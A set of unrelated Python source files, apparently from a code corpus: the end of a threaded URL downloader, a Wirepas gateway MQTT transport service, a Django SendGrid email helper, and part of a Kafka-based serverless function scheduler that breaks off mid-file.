'http://www.bing.com/',
'http://www.yahoo.com/',
],
data_dir = '_data/product_xml/',
auth=('goober@aol.com','password'),
connections=5):
self.urls = queue.Queue()
for i in urls:
self.urls.put(i)
self.data_dir = data_dir
self.connections = connections
self.auth = auth
self.log = log
if not log:
self.log = logging.getLogger()
logging.getLogger("requests").setLevel(logging.WARNING)
# self.log.setLevel(logging.WARNING)
print("Downloading product details:")
with progressbar.ProgressBar(max_value=len(urls)) as self.bar:
self._download()
def _worker(self):
s = requests.Session()
s.auth = self.auth
while True:
url = self.urls.get()
self.bar.update(self.success_count)
bn = os.path.basename(url)
if not bn:
file = self.data_dir + os.path.basename(os.path.dirname(url)) + '.index.html'
else:
file = self.data_dir + bn
if os.path.isfile(file):
modified = os.path.getmtime(file)
# headers = {'If-Modified-Since': } # do this later
# self.log.warning("Skipping {} - file exists".format(url))
self.urls.task_done()
self.success_count += 1
continue
try:
res = s.get(url)
except:
self.log.warning("Bad request {} for url: {}".format(sys.exc_info(), url))
#put item back into queue
self.urls.put(url)
self.urls.task_done()
# this could be due to throttling, exit thread
break
if 200 <=res.status_code < 299:
self.success_count += 1
self.log.debug("Fetched {}".format(url))
else:
self.log.warning("Bad status code: {} for url: {}".format(res.status_code, url))
self.urls.task_done()
continue
with open(file, 'wb') as f:
for chunk in res.iter_content(chunk_size=1024*1024):
if chunk:
f.write(chunk)
self.urls.task_done()
def _download(self):
self.success_count = 0
if not os.path.exists(self.data_dir):
os.makedirs(self.data_dir)
start = time()
for i in range(self.connections):
t = Thread(target=self._worker)
t.daemon = True
t.start()
self.urls.join()
self.log.info('fetched {} URLs in %0.3fs'.format(self.success_count) % (time()-start))
def get_count(self):
'''
Returns the number of successfully fetched urls
'''
return self.success_count
|
transport_service.py
|
# Copyright 2019 Wirepas Ltd licensed under Apache License, Version 2.0
#
# See file LICENSE for full license details.
#
import logging
import os
from time import time
from uuid import getnode
from threading import Thread
import wirepas_messaging
from wirepas_gateway.dbus.dbus_client import BusClient
from wirepas_gateway.protocol.topic_helper import TopicGenerator, TopicParser
from wirepas_gateway.protocol.mqtt_wrapper import MQTTWrapper
from wirepas_gateway.utils import ParserHelper
from wirepas_gateway.utils import LoggerHelper
from wirepas_messaging.gateway.api import (
GatewayResultCode,
GatewayState,
GatewayAPIParsingException,
)
from wirepas_gateway import __version__ as transport_version
from wirepas_gateway import __pkg_name__
# This constant is the actual API level implemented by this transport module (cf WP-RM-128)
IMPLEMENTED_API_VERSION = 1
class TransportService(BusClient):
"""
Implementation of gateway to backend protocol
Get all the events from DBUS and publih it with right format
for gateways
"""
# Maximum hop limit to send a packet is limited to 15 by API (4 bits)
MAX_HOP_LIMIT = 15
def __init__(self, settings, logger=None, **kwargs):
self.logger = logger or logging.getLogger(__name__)
self.logger.info("Version is: %s", transport_version)
super(TransportService, self).__init__(
logger=logger,
c_extension=(settings.full_python is False),
ignored_ep_filter=settings.ignored_endpoints_filter,
**kwargs
)
self.gw_id = settings.gateway_id
self.gw_model = settings.gateway_model
self.gw_version = settings.gateway_version
self.whitened_ep_filter = settings.whitened_endpoints_filter
last_will_topic = TopicGenerator.make_status_topic(self.gw_id)
last_will_message = wirepas_messaging.gateway.api.StatusEvent(
self.gw_id, GatewayState.OFFLINE
).payload
self.mqtt_wrapper = MQTTWrapper(
settings,
self.logger,
self._on_mqtt_wrapper_termination_cb,
self._on_connect,
last_will_topic,
last_will_message,
)
self.mqtt_wrapper.start()
self.logger.info("Gateway started with id: %s", self.gw_id)
def _on_mqtt_wrapper_termination_cb(self):
"""
Callback used to be informed when the MQTT wrapper has exited
It is not a normal situation and better to exit the program
to have a change to restart from a clean session
"""
self.logger.error("MQTT wrapper ends. Terminate the program")
self.stop_dbus_client()
def _set_status(self):
event_online = wirepas_messaging.gateway.api.StatusEvent(
self.gw_id, GatewayState.ONLINE
)
topic = TopicGenerator.make_status_topic(self.gw_id)
self.mqtt_wrapper.publish(topic, event_online.payload, qos=1, retain=True)
def _on_connect(self):
# Register for get gateway info
topic = TopicGenerator.make_get_gateway_info_request_topic(self.gw_id)
self.mqtt_wrapper.subscribe(topic, self._on_get_gateway_info_cmd_received)
# Register for get configs request
topic = TopicGenerator.make_get_configs_request_topic(self.gw_id)
self.mqtt_wrapper.subscribe(topic, self._on_get_configs_cmd_received)
# Register for set config request for any sink
topic = TopicGenerator.make_set_config_request_topic(self.gw_id)
self.mqtt_wrapper.subscribe(topic, self._on_set_config_cmd_received)
# Register for send data request for any sink on the gateway
topic = TopicGenerator.make_send_data_request_topic(self.gw_id)
self.logger.debug("Subscribing to: %s", topic)
# It is important to have a qos of 2 and also from the publisher as 1 could generate
# duplicated packets and we don't know the consequences on end
# application
self.mqtt_wrapper.subscribe(topic, self._on_send_data_cmd_received, qos=2)
# Register for otap commands for any sink on the gateway
topic = TopicGenerator.make_otap_status_request_topic(self.gw_id)
self.mqtt_wrapper.subscribe(topic, self._on_otap_status_request_received)
topic = TopicGenerator.make_otap_load_scratchpad_request_topic(self.gw_id)
self.mqtt_wrapper.subscribe(
topic, self._on_otap_upload_scratchpad_request_received
)
topic = TopicGenerator.make_otap_process_scratchpad_request_topic(self.gw_id)
self.mqtt_wrapper.subscribe(
topic, self._on_otap_process_scratchpad_request_received
)
self._set_status()
self.logger.info("MQTT connected!")
def on_data_received(
self,
sink_id,
timestamp,
src,
dst,
src_ep,
dst_ep,
travel_time,
qos,
hop_count,
data,
):
if self.whitened_ep_filter is not None and dst_ep in self.whitened_ep_filter:
# Only publish payload size but not the payload
self.logger.debug("Filtering payload data")
data_size = data.__len__()
data = None
else:
data_size = None
event = wirepas_messaging.gateway.api.ReceivedDataEvent(
gw_id=self.gw_id,
sink_id=sink_id,
rx_time_ms_epoch=timestamp,
src=src,
dst=dst,
src_ep=src_ep,
dst_ep=dst_ep,
travel_time_ms=travel_time,
qos=qos,
data=data,
data_size=data_size,
hop_count=hop_count,
)
sink = self.sink_manager.get_sink(sink_id)
if sink is None:
# It can happen at sink connection as messages can be received
# before sinks are identified
self.logger.info(
"Message received from unknown sink at the moment %s", sink_id
)
return
network_address = sink.get_network_address()
topic = TopicGenerator.make_received_data_topic(
self.gw_id, sink_id, network_address, src_ep, dst_ep
)
self.logger.debug("Sending data to: %s", topic)
# Set qos to 1 to avoid loading too much the broker
# unique id in event header can be used for duplicate filtering in
# backends
self.mqtt_wrapper.publish(topic, event.payload, qos=1)
def on_stack_started(self, name):
sink = self.sink_manager.get_sink(name)
if sink is None:
self.logger.error("Sink started %s error: unknown sink", name)
return
# Generate a setconfig answer with req_id of 0
response = wirepas_messaging.gateway.api.SetConfigResponse(
0, self.gw_id, GatewayResultCode.GW_RES_OK, sink.sink_id, sink.read_config()
)
topic = TopicGenerator.make_set_config_response_topic(self.gw_id, sink.sink_id)
self.mqtt_wrapper.publish(topic, response.payload, qos=2)
def _send_asynchronous_get_configs_response(self):
# Create a list of different sink configs
configs = []
for sink in self.sink_manager.get_sinks():
config = sink.read_config()
if config is not None:
configs.append(config)
# Generate a setconfig answer with req_id of 0 as not from
# a real request
response = wirepas_messaging.gateway.api.GetConfigsResponse(
0, self.gw_id, GatewayResultCode.GW_RES_OK, configs
)
topic = TopicGenerator.make_get_configs_response_topic(self.gw_id)
self.mqtt_wrapper.publish(topic, response.payload, qos=2)
def deferred_thread(fn):
"""
Decorator to handle a request on its own Thread
to avoid blocking the calling Thread on I/O.
It creates a new Thread but it shouldn't impact the performances
as requests are not supposed to be really frequent (few per seconds)
"""
def wrapper(*args, **kwargs):
thread = Thread(target=fn, args=args, kwargs=kwargs)
thread.start()
return thread
return wrapper
def on_sink_connected(self, name):
self.logger.info("Sink connected, sending new configs")
self._send_asynchronous_get_configs_response()
def on_sink_disconnected(self, name):
self.logger.info("Sink disconnected, sending new configs")
self._send_asynchronous_get_configs_response()
@deferred_thread
def _on_send_data_cmd_received(self, client, userdata, message):
# pylint: disable=unused-argument
self.logger.info("Request to send data")
try:
request = wirepas_messaging.gateway.api.SendDataRequest.from_payload(
message.payload
)
except GatewayAPIParsingException as e:
self.logger.error(str(e))
return
# Get the sink-id from topic
_, sink_id = TopicParser.parse_send_data_topic(message.topic)
self.logger.debug("Request for sink %s", sink_id)
sink = self.sink_manager.get_sink(sink_id)
if sink is not None:
if request.hop_limit > self.MAX_HOP_LIMIT:
res = GatewayResultCode.INVALID_MAX_HOP_COUNT
else:
res = sink.send_data(
request.destination_address,
request.source_endpoint,
request.destination_endpoint,
request.qos,
request.initial_delay_ms,
request.data_payload,
request.is_unack_csma_ca,
request.hop_limit,
)
else:
self.logger.warning("No sink with id: %s", sink_id)
# No sink with this id
res = GatewayResultCode.GW_RES_INVALID_SINK_ID
# Answer to backend
response = wirepas_messaging.gateway.api.SendDataResponse(
request.req_id, self.gw_id, res, sink_id
)
topic = TopicGenerator.make_send_data_response_topic(self.gw_id, sink_id)
self.mqtt_wrapper.publish(topic, response.payload, qos=2)
@deferred_thread
def _on_get_configs_cmd_received(self, client, userdata, message):
# pylint: disable=unused-argument
self.logger.info("Config request received")
try:
request = wirepas_messaging.gateway.api.GetConfigsRequest.from_payload(
message.payload
)
except GatewayAPIParsingException as e:
self.logger.error(str(e))
return
# Create a list of different sink configs
configs = []
for sink in self.sink_manager.get_sinks():
config = sink.read_config()
if config is not None:
configs.append(config)
response = wirepas_messaging.gateway.api.GetConfigsResponse(
request.req_id, self.gw_id, GatewayResultCode.GW_RES_OK, configs
)
topic = TopicGenerator.make_get_configs_response_topic(self.gw_id)
self.mqtt_wrapper.publish(topic, response.payload, qos=2)
def _on_get_gateway_info_cmd_received(self, client, userdata, message):
# pylint: disable=unused-argument
"""
This function doesn't need the decorator @deferred_thread as request is handled
without I/O
"""
self.logger.info("Gateway info request received")
try:
request = wirepas_messaging.gateway.api.GetGatewayInfoRequest.from_payload(
message.payload
)
except GatewayAPIParsingException as e:
self.logger.error(str(e))
return
response = wirepas_messaging.gateway.api.GetGatewayInfoResponse(
request.req_id,
self.gw_id,
GatewayResultCode.GW_RES_OK,
current_time_s_epoch=int(time()),
gateway_model=self.gw_model,
gateway_version=self.gw_version,
implemented_api_version=IMPLEMENTED_API_VERSION,
)
topic = TopicGenerator.make_get_gateway_info_response_topic(self.gw_id)
self.mqtt_wrapper.publish(topic, response.payload, qos=2)
@deferred_thread
def _on_set_config_cmd_received(self, client, userdata, message):
# pylint: disable=unused-argument
self.logger.info("Set config request received")
try:
request = wirepas_messaging.gateway.api.SetConfigRequest.from_payload(
message.payload
)
except GatewayAPIParsingException as e:
self.logger.error(str(e))
return
self.logger.debug("Set sink config: %s", request)
sink = self.sink_manager.get_sink(request.sink_id)
if sink is not None:
res = sink.write_config(request.new_config)
new_config = sink.read_config()
else:
res = GatewayResultCode.GW_RES_INVALID_SINK_ID
new_config = None
response = wirepas_messaging.gateway.api.SetConfigResponse(
request.req_id, self.gw_id, res, request.sink_id, new_config
)
topic = TopicGenerator.make_set_config_response_topic(
self.gw_id, request.sink_id
)
self.mqtt_wrapper.publish(topic, response.payload, qos=2)
@deferred_thread
def _on_otap_status_request_received(self, client, userdata, message):
# pylint: disable=unused-argument
self.logger.info("OTAP status request received")
try:
request = wirepas_messaging.gateway.api.GetScratchpadStatusRequest.from_payload(
message.payload
)
except GatewayAPIParsingException as e:
self.logger.error(str(e))
return
sink = self.sink_manager.get_sink(request.sink_id)
if sink is not None:
d = sink.get_scratchpad_status()
response = wirepas_messaging.gateway.api.GetScratchpadStatusResponse(
request.req_id,
self.gw_id,
GatewayResultCode.GW_RES_OK,
request.sink_id,
d["stored_scartchpad"],
d["stored_status"],
d["stored_type"],
d["processed_scartchpad"],
d["firmware_area_id"],
)
else:
response = wirepas_messaging.gateway.api.GetScratchpadStatusResponse(
request.req_id,
self.gw_id,
GatewayResultCode.GW_RES_INVALID_SINK_ID,
request.sink_id,
)
topic = TopicGenerator.make_otap_status_response_topic(
self.gw_id, request.sink_id
)
self.mqtt_wrapper.publish(topic, response.payload, qos=2)
@deferred_thread
def _on_otap_upload_scratchpad_request_received(self, client, userdata, message):
# pylint: disable=unused-argument
self.logger.info("OTAP upload request received")
try:
request = wirepas_messaging.gateway.api.UploadScratchpadRequest.from_payload(
message.payload
)
except GatewayAPIParsingException as e:
self.logger.error(str(e))
return
self.logger.info("OTAP upload request received for %s", request.sink_id)
sink = self.sink_manager.get_sink(request.sink_id)
if sink is not None:
res = sink.upload_scratchpad(request.seq, request.scratchpad)
else:
res = GatewayResultCode.GW_RES_INVALID_SINK_ID
response = wirepas_messaging.gateway.api.UploadScratchpadResponse(
request.req_id, self.gw_id, res, request.sink_id
)
topic = TopicGenerator.make_otap_upload_scratchpad_response_topic(
self.gw_id, request.sink_id
)
self.mqtt_wrapper.publish(topic, response.payload, qos=2)
@deferred_thread
def _on_otap_process_scratchpad_request_received(self, client, userdata, message):
# pylint: disable=unused-argument
self.logger.info("OTAP process request received")
try:
request = wirepas_messaging.gateway.api.ProcessScratchpadRequest.from_payload(
message.payload
)
except GatewayAPIParsingException as e:
self.logger.error(str(e))
return
sink = self.sink_manager.get_sink(request.sink_id)
if sink is not None:
res = sink.process_scratchpad()
else:
res = GatewayResultCode.GW_RES_INVALID_SINK_ID
response = wirepas_messaging.gateway.api.ProcessScratchpadResponse(
request.req_id, self.gw_id, res, request.sink_id
)
topic = TopicGenerator.make_otap_process_scratchpad_response_topic(
self.gw_id, request.sink_id
)
self.mqtt_wrapper.publish(topic, response.payload, qos=2)
def parse_setting_list(list_setting):
""" This function parse ep list specified from setting file or cmd line
Input list has following format [1, 5, 10-15] as a string or list of string
and is expended as a single list [1, 5, 10, 11, 12, 13, 14, 15]
Args:
list_setting(str or list): the list from setting file or cmd line.
Returns: A single list of ep
"""
if isinstance(list_setting, str):
# List is a string from cmd line
list_setting = list_setting.replace("[", "")
list_setting = list_setting.replace("]", "")
list_setting = list_setting.split(",")
single_list = []
for ep in list_setting:
# Check if ep is directly an int
if isinstance(ep, int):
if ep < 0 or ep > 255:
raise SyntaxError("EP out of bound")
single_list.append(ep)
continue
# Check if ep is a single ep as string
try:
ep = int(ep)
if ep < 0 or ep > 255:
raise SyntaxError("EP out of bound")
single_list.append(ep)
continue
except ValueError:
# Probably a range
pass
# Check if ep is a range
try:
ep = ep.replace("'", "")
lower, upper = ep.split("-")
lower = int(lower)
upper = int(upper)
if lower > upper or lower < 0 or upper > 255:
raise SyntaxError("Wrong EP range value")
single_list += list(range(lower, upper + 1))
except (AttributeError, ValueError):
raise SyntaxError("Wrong EP range format")
return single_list
def _check_duplicate(args, old_param, new_param, default, logger):
old_param_val = getattr(args, old_param, default)
new_param_val = getattr(args, new_param, default)
if new_param_val == old_param_val:
# Nothing to update
return
if old_param_val != default:
# Old param is set, check if new_param is also set
if new_param_val == default:
setattr(args, new_param, old_param_val)
logger.warning(
"Param %s is deprecated, please use %s instead", old_param, new_param
)
else:
logger.error(
"Param %s and %s cannot be set at the same time", old_param, new_param
)
exit()
def _update_parameters(settings, logger):
"""
Function to handle the backward compatibility with old parameters name
Args:
settings: Full parameters
Returns: None
"""
_check_duplicate(settings, "host", "mqtt_hostname", None, logger)
_check_duplicate(settings, "port", "mqtt_port", 8883, logger)
_check_duplicate(settings, "username", "mqtt_username", None, logger)
_check_duplicate(settings, "password", "mqtt_password", None, logger)
_check_duplicate(settings, "tlsfile", "mqtt_certfile", None, logger)
_check_duplicate(
settings, "unsecure_authentication", "mqtt_force_unsecure", False, logger
)
_check_duplicate(settings, "gwid", "gateway_id", None, logger)
if settings.gateway_id is None:
settings.gateway_id = str(getnode())
# Parse EP list that should not be published
if settings.ignored_endpoints_filter is not None:
try:
settings.ignored_endpoints_filter = parse_setting_list(
settings.ignored_endpoints_filter
)
logger.debug("Ignored endpoints are: %s", settings.ignored_endpoints_filter)
except SyntaxError as e:
logger.error("Wrong format for ignored_endpoints_filter EP list (%s)", e)
exit()
if settings.whitened_endpoints_filter is not None:
try:
settings.whitened_endpoints_filter = parse_setting_list(
settings.whitened_endpoints_filter
)
logger.debug(
"Whitened endpoints are: {}".format(settings.whitened_endpoints_filter)
)
except SyntaxError as e:
logger.error("Wrong format for whitened_endpoints_filter EP list (%s)", e)
exit()
def _check_parameters(settings, logger):
if settings.mqtt_force_unsecure and settings.mqtt_certfile:
# If tls cert file is provided, unsecure authentication cannot
# be set
logger.error("Cannot give certfile and disable secure authentication")
exit()
try:
if set(settings.ignored_endpoints_filter) & set(
settings.whitened_endpoints_filter
):
logger.error("Some endpoints are both ignored and whitened")
exit()
except TypeError:
# One of the filter list is None
pass
def main():
"""
Main service for transport module
"""
parse = ParserHelper(
description="Wirepas Gateway Transport service arguments",
version=transport_version,
)
parse.add_file_settings()
parse.add_mqtt()
parse.add_gateway_config()
parse.add_filtering_config()
parse.add_deprecated_args()
settings = parse.settings()
# Set default debug level
debug_level = "info"
try:
debug_level = os.environ["DEBUG_LEVEL"]
print(
"Deprecated environment variable DEBUG_LEVEL "
"(it will be dropped from version 2.x onwards)"
" please use WM_DEBUG_LEVEL instead."
)
except KeyError:
pass
try:
debug_level = os.environ["WM_DEBUG_LEVEL"]
except KeyError:
pass
log = LoggerHelper(module_name=__pkg_name__, level=debug_level)
logger = log.setup()
_update_parameters(settings, logger)
# after this stage, mqtt deprecated argument cannot be used
_check_parameters(settings, logger)
TransportService(settings=settings, logger=logger).run()
if __name__ == "__main__":
main()
|
methods.py
|
import logging
import threading
from django.conf import settings
from django.contrib import messages
from django.contrib.messages import get_messages
from django.core.mail import send_mail
from django.shortcuts import render
from django.test import TestCase
from django.utils.crypto import get_random_string
# from users.forms import CustomUserCreationForm # do not import this! https://stackoverflow.com/a/16975976/5394180
from sendgrid import Mail, SendGridAPIClient
def generate_token():
return get_random_string(length=32)
def send_mail_async(sender: str, receivers, subject, dynamic_template_data: dict, template_id):
message = Mail(
from_email=sender,
to_emails=receivers,
subject=subject,
)
message.dynamic_template_data = dynamic_template_data
message.template_id = template_id
sg = SendGridAPIClient(settings.SENDGRID_API_KEY)
t = threading.Thread(target=sg.send, args=(message,), name=f'email to {receivers}')
t.setDaemon(True)
t.start()
def check_response_message(testcase: TestCase, response, expected_message):
response_messages = list(get_messages(response.wsgi_request))
testcase.assertEqual(len(1))
testcase.assertEqual(str(response_messages[0]), expected_message)
|
serial_consumer.py
|
import time
import json
import queue
import socket
import requests
import threading
from sys import exit
from threading import Thread
from kafka import KafkaConsumer, KafkaProducer
from function_chains_pb2 import ChainState
from concurrent.futures import ThreadPoolExecutor
# Configuration
# Set to True to disable invoking serverless functions for testing
mock_invocations = True
# ip/port to listen on
logger_port = 10000
serverIp = "127.0.0.1"
# Scheduling Policies
# Uncomment only the desired policy
# Note that the simpleQueuePriorityPolicy requires the enqueue_simple_priority
# queueing policy to work.
# All other existing policies require enqueue_pending_or_running.
def scheduling_policy():
return currentlyRunningChainsPolicy()
#return getShortestJobFirst()
#return fairShareOnChainsPolicy()
#return fairShareOnFunctionsPolicy()
#return strictFunctionPriorityPolicy()
#return hybridBinPackingPolicy()
#return simpleQueuePriorityPolicy()
# Queueing Policies
# Uncomment only the desired policy
# The only scheduling policy that needs enqueue_simple_priority is
# simpleQueuePriorityPolicy, all others require enqueue_pending_or_running
def enqueue_invocation(invocation, chainAlreadyRunning):
return enqueue_pending_or_running(invocation, chainAlreadyRunning)
#return enqueue_simple_priority(invocation, chainAlreadyRunning)
# hybrid clouds
localCloudConcurrency = threading.Semaphore(200)
# logging details
chains_records = []
functions_records = []
logging_running_records = []
logging_finished_records = []
# arrivalRateQueue length
arrivalRateQueueLength = 30
# kafka queue timeout in milliseconds
kafkaTimeOut = 10
kafkaPQSoftLimit = 100
kafkaCRQSoftLimit = 100
# kafka queue length
kafkaCRQLength = 0
# in memory queue size
queueSize = 1000000
inMemorySleep = 0.0005
# threading details
fsMetricServerLock = threading.Lock()
csMetricServerLock = threading.Lock()
psMetricServerLock = threading.Lock()
kafkaCRQLengthLock = threading.Lock()
raceConditionLock = threading.Lock()
lockFunctionSideLogger = threading.Lock()
concurrency = 1000
threadPool = 1000
pool = threading.Semaphore(threadPool)
concurrencyPool = threading.Semaphore(concurrency)
# SJF dictionary - format (chainId, nodeId): average remaining runtime
SJFLookup = { (1,1): 20.2,
(1,2): 20,
(1,3): 20,
(2,1): 39,
(2,2): 19,
(2,3): 2,
(3,1): 37.2,
(3,2): 20,
(3,3): 37,
(3,4): 17}
# Main scheduling loop. After initializing a worker thread pool,
# we invoke the Policy Framework to choose the next function to invoke, then invoke it.
def schedule_invocations():
executor = ThreadPoolExecutor(max_workers=threadPool)
iter = 0
while(True):
timeStampList = []
timeStampList.append(iter)
timeStampList.append(time.time())
# Select a function to invoke
choice = scheduling_policy()
timeStampList.append(time.time())
# If a choice was made, submit it to the worker pool to execute
# Else, continue the loop
if (choice != None):
iter = iter + 1
raceConditionLock.acquire()
timeStampList.append(time.time())
executor.submit(invoker_thread, choice, timeStampList)
# Function Side Metric Server
# Only this or the consumer side metric server should call updateRecords(timeStamp)
def fsMetricServer():
while(True):
time.sleep(inMemorySleep)
if not(inMemoryFSQ.empty()):
timeStamp = inMemoryFSQ.get()
#print(timeStamp)
#updateRecords(timeStamp)
#print(metricServer.collectiveFunctionLevelMetric, metricServer.collectiveChainLevelMetric)
# Consumer Side Metric Server
# Only this or the function side metric server should call updateRecords(timeStamp)
def csMetricServer():
while(True):
time.sleep(inMemorySleep)
timeStamp = ""
if not(inMemoryCSSQ.empty()):
timeStamp = inMemoryCSSQ.get()
elif not(inMemoryCSEQ.empty()):
timeStamp = inMemoryCSEQ.get()
if (timeStamp != ""):
inMemoryCSL.put(timeStamp)
updateRecords(timeStamp)
print(metricServer.collectiveFunctionLevelMetric, metricServer.collectiveChainLevelMetric)
temp = json.loads(timeStamp.decode("utf-8").split("-")[3].replace("'", "\""))
#print(metricServer.individualFunctionMetricList[0]['instancesRunning'], time.time())
# Producer side metric server
# Processes metrics produced by the producer
def psMetricServer():
while(True):
time.sleep(inMemorySleep)
if not(inMemoryPSQ.empty()):
timeStamp = inMemoryPSQ.get()
updateArrivalRecords(timeStamp)
# Read Kafka messages into the in-memory pending queue for performance
def kafkaToInMemoryPQ():
while(True):
msg = consumer_PQ._poll_once(timeout_ms=kafkaTimeOut, max_records=1)
if (msg):
#print("kafka to memory")
for key,value in msg.items():
timeStamp = value[0].value
enqueue_invocation(timeStamp, chainAlreadyRunning=False)
# Read Kafka messages into the in-memory producer queue for performance
def kafkaToInMemoryPSQ():
while(True):
msg = consumer_PSQ._poll_once(timeout_ms=kafkaTimeOut, max_records=1)
if (msg):
#print("kafka to memory")
for key,value in msg.items():
timeStamp = value[0].value
inMemoryPSQ.put(timeStamp)
# Update function chain arrival metrics with a new timestamp
def updateArrivalsChainsMetricList(timeStamp):
psMetricServerLock.acquire()
newChainEntry = True
for i in metricServer.arrivalsChainsMetricList:
if (i['chainId'] == timeStamp.chainId):
newChainEntry = False
i['arrivalRateQueue'].append(timeStamp.start)
if (len(i['arrivalRateQueue']) > arrivalRateQueueLength):
i['arrivalRateQueue'].pop(0)
timeDifference = i['arrivalRateQueue'][-1] - i['arrivalRateQueue'][0]
i['arrivalRate'] = len(i['arrivalRateQueue'])/timeDifference
if (newChainEntry):
tempDictionary = { 'chainId': timeStamp.chainId,
'arrivalRateQueue': [timeStamp.start],
'arrivalRate': 0,
'chainFunctionIdList': timeStamp.chainFunctionIdList}
metricServer.arrivalsChainsMetricList.append(tempDictionary)
psMetricServerLock.release()
# Update function specific metrics with a new timestamp
def updateIndividualFunctionMetricList(timeStamp):
newEntry = True
for i in metricServer.individualFunctionMetricList:
if (i['functionId'] == timeStamp.functionId):
newEntry = False
if (timeStamp.finish == 'running'):
if (timeStamp.chainId not in i['chainIdList']):
i['chainIdList'].append(timeStamp.chainId)
i['instancesRunning'] = i['instancesRunning'] + 1
else:
i['instancesRunning'] = i['instancesRunning'] - 1
i['instancesCompleted'] = i['instancesCompleted'] + 1
i['avgRuntime'] = (i['avgRuntime']*(i['instancesCompleted']-1)+(timeStamp.finish-timeStamp.start))/i['instancesCompleted']
if (newEntry):
tempDictionary = { 'functionId': timeStamp.functionId,
'chainIdList': [timeStamp.chainId],
'instancesRunning': 1,
'instancesCompleted': 0,
'avgRuntime': 0}
metricServer.individualFunctionMetricList.append(tempDictionary)
# Update aggregate metrics with a new timestamp
def updateCollectiveFunctionLevelMetrics(timeStamp):
if (timeStamp.finish == 'running'):
metricServer.collectiveFunctionLevelMetric['totalRunningFunctions'] = metricServer.collectiveFunctionLevelMetric['totalRunningFunctions'] + 1
else:
metricServer.collectiveFunctionLevelMetric['totalRunningFunctions'] = metricServer.collectiveFunctionLevelMetric['totalRunningFunctions'] - 1
metricServer.collectiveFunctionLevelMetric['totalCompletedFunctions'] = metricServer.collectiveFunctionLevelMetric['totalCompletedFunctions'] + 1
# Update function chain specific metrics with a new timestamp
def updateIndividualChainLevelMetrics(timeStamp):
newChainEntry = True
for i in metricServer.individualChainMetricList:
if (i['chainId'] == timeStamp.chainId):
newChainEntry = False
newInstanceEntry = True
for j in i['uniqueInstanceList']:
if ((timeStamp.chainId, timeStamp.instanceId) == j['uid']):
newInstanceEntry = False
if (timeStamp.finish != 'running'):
i['functionsRunning'] = i['functionsRunning'] - 1
else:
i['functionsRunning'] = i['functionsRunning'] + 1
if (timeStamp.nodeId in j['lastNodeIdList'] and timeStamp.finish != 'running'):
j['lastNodeIdList'].remove(timeStamp.nodeId)
if (len(j['lastNodeIdList']) < 1):
j['endTime'] = time.time()
i['instancesRunning'] = i['instancesRunning'] - 1
i['instancesCompleted'] = i['instancesCompleted'] + 1
runtime = j['endTime']-j['startTime']
i['avgRuntime'] = (i['avgRuntime']*(i['instancesCompleted']-1)+runtime)/i['instancesCompleted']
if (newInstanceEntry):
tempDictionary = {
'uid': (timeStamp.chainId, timeStamp.instanceId),
'startTime': time.time(),
'endTime': 'running',
'lastNodeIdList': timeStamp.lastNodeIdList}
i['uniqueInstanceList'].append(tempDictionary)
i['instancesRunning'] = i['instancesRunning'] + 1
i['functionsRunning'] = i['functionsRunning'] + 1
if (newChainEntry):
tempDictionary = { 'chainId': timeStamp.chainId,
'uniqueInstanceList': [{
'uid': (timeStamp.chainId, timeStamp.instanceId),
'startTime': time.time(),
'endTime': 'running',
'lastNodeIdList': timeStamp.lastNodeIdList}],
'chainFunctionIDs': timeStamp.chainFunctionIdList,
'instancesRunning': 1,
'functionsRunning': 1,
'instancesCompleted': 0,
'avgRuntime': 0}
metricServer.individualChainMetricList.append(tempDictionary)
# Update aggregate function chain metrics
def updateCollectiveChainLevelMetrics():
totalRunning = 0
totalCompleted = 0
for i in metricServer.individualChainMetricList:
totalRunning = totalRunning + i['instancesRunning']
totalCompleted = totalCompleted + i['instancesCompleted']
metricServer.collectiveChainLevelMetric['totalRunningChains'] = totalRunning
metricServer.collectiveChainLevelMetric['totalCompletedChains'] = totalCompleted
# Update all instantaneous state metrics with a new timestamp
def updateStateObjects(timeStamp):
csMetricServerLock.acquire()
updateIndividualFunctionMetricList(timeStamp)
updateCollectiveFunctionLevelMetrics(timeStamp)
updateIndividualChainLevelMetrics(timeStamp)
updateCollectiveChainLevelMetrics()
csMetricServerLock.release()
if (raceConditionLock.locked() and timeStamp.finish == 'running'):
raceConditionLock.release()
# Update all arrival related metrics with a new timestamp
def updateArrivalRecords(item):
#temp = item.split("-")
## in-Memory
temp = item.decode("utf-8").split("-")
tempDictionary = json.loads(temp[3].replace("'", "\""))
#tempDictionary['chainFunctionIdList'] = json.loads(tempDictionary['chainFunctionIdList'])
timestamp = TimeStamp(float(temp[2]), 'running', temp[0], tempDictionary['instanceId'],
tempDictionary['chainId'], 'NA', 'NA', 'NA', tempDictionary['chainFunctionIdList'])
csMetricServerLock.acquire()
updateArrivalsChainsMetricList(timestamp)
updateFairShareFunctionQuota()
updateFunctionPriorities(tempDictionary['extras'])
updateChainPriorities(tempDictionary['extras'])
csMetricServerLock.release()
# Update function priorities for reactive priority scheduling
def updateFunctionPriorities(timestamp):
if ('functionPriorities' in timestamp[0]):
for key, value in sorted(timestamp[0]['functionPriorities'].items()):
metricServer.functionPrioritiesList.append(int(key))
#print(key,value)
# Update chain priorities for reactive priority scheduling
def updateChainPriorities(timestamp):
if ('chainPriorities' in timestamp[0]):
for key, value in sorted(timestamp[0]['chainPriorities'].items()):
metricServer.chainPrioritiesList.append(int(key))
#print(key,value)
# Update log data structures according to the input log text
def updateRecords(item):
temp = item.decode("utf-8").split("-")
if (temp[1] == 'start'):
tempDictionary = json.loads(temp[3].replace("'", "\""))
tempDictionary['lastNodeIdList'] = json.loads(tempDictionary['lastNodeIdList'])
tempDictionary['chainFunctionIdList'] = json.loads(tempDictionary['chainFunctionIdList'])
timestamp = TimeStamp(float(temp[2]), 'running', temp[0], tempDictionary['instanceId'],
tempDictionary['chainId'], tempDictionary['functionId'], tempDictionary['nodeId'],
tempDictionary['lastNodeIdList'], tempDictionary['chainFunctionIdList'])
logging_running_records.append(timestamp)
updateStateObjects(timestamp)
elif (temp[1] == 'end'):
tempDictionary = json.loads(temp[3].replace("'", "\""))
for i in logging_running_records:
if (i.type==temp[0] and i.instanceId==tempDictionary['instanceId'] and i.chainId==tempDictionary['chainId'] and
i.functionId==tempDictionary['functionId'] and i.nodeId==tempDictionary['nodeId']):
i.finish = float(temp[2])
logging_finished_records.append(i)
logging_running_records.remove(i)
#print(tempDictionary)
updateStateObjects(i)
break
#printLoggingLists()
# Consumer side logging thread
def csLogging():
while(True):
time.sleep(inMemorySleep)
if not(inMemoryCSL.empty()):
timeStamp = inMemoryCSL.get().decode("utf-8")
with open("serverLogsCS.txt", "a") as logfile:
logfile.write(str(timeStamp)+'\n')
# Function side logging thread
